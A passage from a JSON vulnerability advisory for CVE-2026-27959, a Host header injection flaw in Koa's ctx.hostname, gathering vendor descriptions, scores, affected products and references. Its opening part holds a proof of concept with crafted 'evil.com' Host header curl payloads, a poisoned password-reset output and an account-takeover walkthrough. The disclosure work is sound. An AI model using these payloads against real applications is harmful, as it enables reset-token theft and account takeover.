support:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget host() {\n const proxy = this.app.proxy;\n let host = proxy && this.get('X-Forwarded-Host');\n if (!host) {\n if (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n if (!host) host = this.get('Host');\n }\n if (!host) return '';\n return host.split(',')[0].trim();\n}\n```\n\n### The Problem\n\nThe parsing logic simply splits on the first `:` and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.\n\n**RFC 3986 Section 3.2.2** defines the host component as:\n\n```\nhost = IP-literal / IPv4address / reg-name\nreg-name = *( unreserved / pct-encoded / sub-delims )\nunreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\"\nsub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\"\n```\n\nThe `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.\n\n### Attack Vector\n\nWhen an attacker sends:\n\n```\nHost: evil.com:fake@legitimate.com:3000\n```\n\nKoa parses this as:\n\n| API | Returns | Notes |\n|-----|---------|-------|\n| `ctx.get('Host')` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header |\n| `ctx.hostname` | `\"evil.com\"` | **Attacker-controlled** |\n| `ctx.host` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header value |\n| `ctx.origin` | `\"http://evil.com:fake@legitimate.com:3000\"` | Protocol + malformed host |\n\nThe `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser.\n\n### Additional Concern: `ctx.origin`\n\nKoa's `ctx.origin` property concatenates protocol and host without validation:\n\n```javascript\n// lib/request.js\nget origin() {\n return `${this.protocol}://${this.host}`;\n}\n```\n\nApplications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.\n\n### HTTP/2 Consideration\n\nKoa explicitly checks `httpVersionMajor >= 2` to read the `:authority` pseudo-header:\n\n```javascript\nif (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n```\n\nThe same vulnerability applies - malformed `:authority` values containing userinfo would be accepted and parsed identically.\n\n## PoC\n\n### Setup\n\n```javascript\n// server.js\nconst Koa = require('koa'); \nconst app = new Koa();\n\n// Simulates password reset URL generation (common vulnerable pattern)\napp.use(async ctx => {\n if (ctx.path === '/forgot-password') {\n const resetToken = 'abc123securtoken';\n const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;\n \n ctx.body = {\n message: 'Password reset link generated',\n resetUrl: resetUrl,\n debug: {\n rawHost: ctx.get('Host'),\n parsedHostname: ctx.hostname,\n origin: ctx.origin,\n protocol: ctx.protocol\n }\n };\n }\n});\n\napp.listen(3000, () => console.log('Server on http://localhost:3000'));\n```\n\n### Exploit\n\n```bash\ncurl -H \"Host: evil.com:fake@localhost:3000\" http://localhost:3000/forgot-password\n```\n\n### Result\n\n```json\n{\n \"message\": \"Password reset link generated\",\n \"resetUrl\": \"http://evil.com/reset?token=abc123securtoken\",\n \"debug\": {\n \"rawHost\": \"evil.com:fake@localhost:3000\",\n \"parsedHostname\": \"evil.com\",\n \"origin\": \"http://evil.com:fake@localhost:3000\",\n \"protocol\": \"http\"\n }\n}\n```\n\nThe password reset URL points to `evil.com` instead of the legitimate server. In a real attack:\n\n1. Attacker requests password reset for victim's email with malicious Host header\n2. Server generates reset link using `ctx.hostname` → `https://evil.com/reset?token=SECRET`\n3. Victim receives email with poisoned link\n4. Victim clicks link, token is sent to attacker's server\n5. Attacker uses token to reset victim's password\n\n### Additional Test Cases\n\n```bash\n# Basic injection\ncurl -H \"Host: evil.com:x@legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n\n# With port preservation attempt\ncurl -H \"Host: evil.com:443@legitimate.com:3000\" http://localhost:3000/forgot-password \n# Result: hostname = \"evil.com\"\n\n# Unicode/encoded variations\ncurl -H \"Host: evil.com:x%40legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n```\n\n### Deployment Consideration\n\nFor this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:\n\n1. **No reverse proxy** - Application directly exposed to internet\n2. **Misconfigured proxy** - Proxy doesn't override/validate Host header\n3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected\n4. **Default virtual host** - Server is the catch-all for unrecognized Host headers\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-20: Improper Input Validation\n- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax\n\n### Attack Scenarios\n\n**1. Password Reset Poisoning (High Severity)**\n- Attacker hijacks password reset tokens by poisoning reset URLs\n- Requires victim to click link in email\n- Results in account takeover\n\n**2. Email Verification Bypass**\n- Attacker poisons email verification links\n- Can verify attacker-controlled email on victim accounts\n\n**3. OAuth/SSO Callback Manipulation**\n- Applications using `ctx.hostname` for OAuth redirect URIs\n- Attacker redirects OAuth callbacks to malicious server\n- Results in token theft\n\n**4. Web Cache Poisoning**\n- If responses are cached without Host in cache key\n- Poisoned URLs served to all users\n- Persistent XSS/phishing via cached responses\n\n**5. Server-Side Request Forgery (SSRF)**\n- Internal routing decisions based on `ctx.hostname`\n- Attacker manipulates which backend receives requests\n\n### Who Is Impacted\n\n- **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation\n- **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-7gcc-r8m5-44qm.json?alt=media" }, { "category": "description", "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.\nA flaw was found in Koa’s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.\nRed Hat Product Security considers this issue as High severity. \nA remote, unauthenticated attacker can send a specially crafted HTTP Host header containing a valid RFC 3986 userinfo component (using the @ delimiter). Due to improper parsing of the authority field in the ctx.hostname API, the application may treat attacker-controlled input as the hostname value. Exploitation occurs when the server processes the malicious request and does not require user interaction (UI:N).\nApplications that rely on ctx.hostname to construct absolute URLs, such as: password reset links, email verification links, OAuth redirect URIs, or webhook endpoints, may generate security sensitive URLs that reference an attacker controlled domain. This can result in integrity violations, including manipulation of authentication flows or account takeover scenarios. Integrity impact is therefore rated High.\nConfidentiality impact is considered Low because disclosure of sensitive data depends on application-specific usage patterns. The vulnerability does not automatically expose information from the server. However, if an affected application uses the manipulated hostname value to generate security-sensitive links such as password reset or email verification URLs and embeds tokens in those links without additional validation, a victim who later follows such a link may inadvertently disclose those tokens to an attacker controlled domain. Such disclosure is conditional, application-dependent like how the application constructs URLs. Also, the subsequent user interaction beyond the initial exploitation, the confidentiality impact is assessed as Low (C:L).", "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27959" }, { "category": "description", "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27959.json?alt=media" }, { "category": "other", "text": "0.00117", "title": "EPSS" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5723466", "CSAFPID-5723467", "CSAFPID-5733339", "CSAFPID-1439279", "CSAFPID-1439328", "CSAFPID-1508265", "CSAFPID-1508266", "CSAFPID-2159493", "CSAFPID-2933419", "CSAFPID-5157328", "CSAFPID-5222758", "CSAFPID-5486263", "CSAFPID-5486265", "CSAFPID-5736894", "CSAFPID-5129397", "CSAFPID-5129398", "CSAFPID-5138906", "CSAFPID-5748307", "CSAFPID-5748308", "CSAFPID-5748309", "CSAFPID-2205440", "CSAFPID-2205442", "CSAFPID-2205443", "CSAFPID-2205447", "CSAFPID-2205448", "CSAFPID-3780409", "CSAFPID-3780410", "CSAFPID-3780411", "CSAFPID-3780412", "CSAFPID-3780413", "CSAFPID-3780414", "CSAFPID-3780415", "CSAFPID-3780416", "CSAFPID-3780417", "CSAFPID-3780418", "CSAFPID-3780419", "CSAFPID-3780420", "CSAFPID-3780421", "CSAFPID-3780422", "CSAFPID-3780423", "CSAFPID-3780424", "CSAFPID-3780425", "CSAFPID-3780426", "CSAFPID-3780427", "CSAFPID-3780428", "CSAFPID-3780429", "CSAFPID-3780430", "CSAFPID-3780431", "CSAFPID-3780432", "CSAFPID-3780433", "CSAFPID-3780434", "CSAFPID-3780435", "CSAFPID-3780436", "CSAFPID-3780437", "CSAFPID-3780438", "CSAFPID-3780439", "CSAFPID-3780440", "CSAFPID-3780441", "CSAFPID-3780442", "CSAFPID-3780443", "CSAFPID-3780444", "CSAFPID-3780445", "CSAFPID-3780446", "CSAFPID-3780447", "CSAFPID-3780448", "CSAFPID-3780449", "CSAFPID-3780450", "CSAFPID-3780451", "CSAFPID-3780452", "CSAFPID-3780453", "CSAFPID-3780454", "CSAFPID-3780455", "CSAFPID-3780456", "CSAFPID-3780457", "CSAFPID-3780458", "CSAFPID-3780459", "CSAFPID-3780460", "CSAFPID-3780461", "CSAFPID-3780462", "CSAFPID-3780463", "CSAFPID-3780464", "CSAFPID-3780466", "CSAFPID-3780467", "CSAFPID-3780468", "CSAFPID-3780469", "CSAFPID-3780470", "CSAFPID-3780471", "CSAFPID-3780472", "CSAFPID-3780473", "CSAFPID-3780474", "CSAFPID-3780475", "CSAFPID-3780476", "CSAFPID-3780477", "CSAFPID-3780478", "CSAFPID-3780479", "CSAFPID-3780480", "CSAFPID-3797112", "CSAFPID-3797113", "CSAFPID-3797114", "CSAFPID-3797115", "CSAFPID-3797116", "CSAFPID-3797117", "CSAFPID-5129396", "CSAFPID-5140726", "CSAFPID-5140727", "CSAFPID-5748305", "CSAFPID-5748306" ], "known_not_affected": [ "CSAFPID-1441150", "CSAFPID-2467450" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27959" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27959" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27959.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27959" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-7gcc-r8m5-44qm" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-7gcc-r8m5-44qm" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-7gcc-r8m5-44qm.json?alt=media" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27959" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27959.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27959.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-7gcc-r8m5-44qm" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27959" }, { "category": "external", "summary": "Reference - osv", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/27xxx/CVE-2026-27959.json" } ], "remediations": [ { "category": "mitigation", "details": "Red Hat is not aware of a practical temporary workaround that fully mitigates this issue or meets Red Hat Product Security's standards for usability, deployment, applicability, or stability. Customers are advised to apply the relevant security updates once they become available.", "product_ids": [ "CSAFPID-1439279", "CSAFPID-1439328", "CSAFPID-1441150", "CSAFPID-1508265", "CSAFPID-1508266", "CSAFPID-2159493", "CSAFPID-2467450", "CSAFPID-2933419", "CSAFPID-5157328", "CSAFPID-5222758", "CSAFPID-5486263", "CSAFPID-5486265" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1439279", "CSAFPID-1439328", "CSAFPID-1508265", "CSAFPID-1508266", "CSAFPID-2159493", "CSAFPID-2205440", "CSAFPID-2205442", "CSAFPID-2205443", "CSAFPID-2205447", "CSAFPID-2205448", "CSAFPID-2933419", "CSAFPID-3780409", "CSAFPID-3780410", "CSAFPID-3780411", "CSAFPID-3780412", "CSAFPID-3780413", "CSAFPID-3780414", "CSAFPID-3780415", "CSAFPID-3780416", "CSAFPID-3780417", "CSAFPID-3780418", "CSAFPID-3780419", "CSAFPID-3780420", "CSAFPID-3780421", "CSAFPID-3780422", "CSAFPID-3780423", "CSAFPID-3780424", "CSAFPID-3780425", "CSAFPID-3780426", "CSAFPID-3780427", "CSAFPID-3780428", "CSAFPID-3780429", "CSAFPID-3780430", "CSAFPID-3780431", "CSAFPID-3780432", "CSAFPID-3780433", "CSAFPID-3780434", "CSAFPID-3780435", "CSAFPID-3780436", "CSAFPID-3780437", "CSAFPID-3780438", "CSAFPID-3780439", "CSAFPID-3780440", "CSAFPID-3780441", "CSAFPID-3780442", "CSAFPID-3780443", "CSAFPID-3780444", "CSAFPID-3780445", "CSAFPID-3780446", "CSAFPID-3780447", "CSAFPID-3780448", "CSAFPID-3780449", "CSAFPID-3780450", "CSAFPID-3780451", "CSAFPID-3780452", "CSAFPID-3780453", "CSAFPID-3780454", "CSAFPID-3780455", "CSAFPID-3780456", "CSAFPID-3780457", "CSAFPID-3780458", "CSAFPID-3780459", "CSAFPID-3780460", "CSAFPID-3780461", "CSAFPID-3780462", "CSAFPID-3780463", "CSAFPID-3780464", "CSAFPID-3780466", "CSAFPID-3780467", "CSAFPID-3780468", "CSAFPID-3780469", "CSAFPID-3780470", "CSAFPID-3780471", "CSAFPID-3780472", "CSAFPID-3780473", "CSAFPID-3780474", "CSAFPID-3780475", "CSAFPID-3780476", "CSAFPID-3780477", "CSAFPID-3780478", "CSAFPID-3780479", "CSAFPID-3780480", "CSAFPID-3797112", "CSAFPID-3797113", "CSAFPID-3797114", "CSAFPID-3797115", "CSAFPID-3797116", "CSAFPID-3797117", "CSAFPID-5129396", "CSAFPID-5129397", "CSAFPID-5129398", "CSAFPID-5138906", "CSAFPID-5140726", "CSAFPID-5140727", "CSAFPID-5157328", "CSAFPID-5222758", "CSAFPID-5486263", "CSAFPID-5486265", "CSAFPID-5723466", "CSAFPID-5723467", "CSAFPID-5733339", "CSAFPID-5736894", "CSAFPID-5748305", "CSAFPID-5748306", "CSAFPID-5748307", "CSAFPID-5748308", "CSAFPID-5748309" ] } ], "title": "CVE-2026-27959" } ] }